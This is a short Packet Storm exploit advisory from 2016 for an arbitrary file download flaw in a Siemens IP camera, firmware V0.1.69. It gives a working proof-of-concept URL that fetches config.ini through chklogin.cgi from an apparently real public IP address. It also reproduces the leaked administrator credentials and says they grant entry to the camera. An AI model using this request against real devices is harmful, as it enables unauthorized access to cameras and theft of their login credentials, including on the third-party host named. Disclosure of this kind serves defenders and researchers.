Siemens IP Camera 0.1.69 Arbitrary File Download

2016-09-14T00:00:00
ID PACKETSTORM:138717
Type packetstorm
Reporter Vuppala Dhanunjaya
Modified 2016-09-14T00:00:00

Description

                                        
                                            `#Exploit Title: Siemens IP Camera :: Arbitrary file download  
# Date: [14-september-2016]  
# Exploit Author: [vuppala.Dhanunjaya]  
# Vendor Homepage: [www.siemens.com]  
# Version: [V0.1.69]  
# Tested on: [Windows 10,ubuntu 14.04 LTS]  
# Email : vuppaladhani@gmail.com  
  
========================================  
TEAM   
========================================  
  
Harsha Vardhan (https://www.facebook.com/HarshaHere)  
Santosh Kumar (https://www.facebook.com/M4drob0t)  
Akhil Manikanth(https://www.facebook.com/IaMAkIlManIkAnTh)  
Manish Yadav (https://www.facebook.com/spikeymanish)  
  
Thankyou for the support   
  
========================================  
TECHNICAL DETAILS & POC  
========================================  
  
Target : https://78.56.240.235/cgi-bin/chklogin.cgi?rnd=1473849790369  
  
Downloding the config file : cgi-bin/chklogin.cgi?file=config.ini   
  
https://78.56.240.235/cgi-bin/chklogin.cgi?file=config.ini  
  
this config.ini file contains the username nd password of the administration login  
  
account.admin.user_id=admin  
account.admin.password=admin  
account.admin.language=english  
  
using this login credentials we can get into the IPcam  
  
  
Thankyou  
`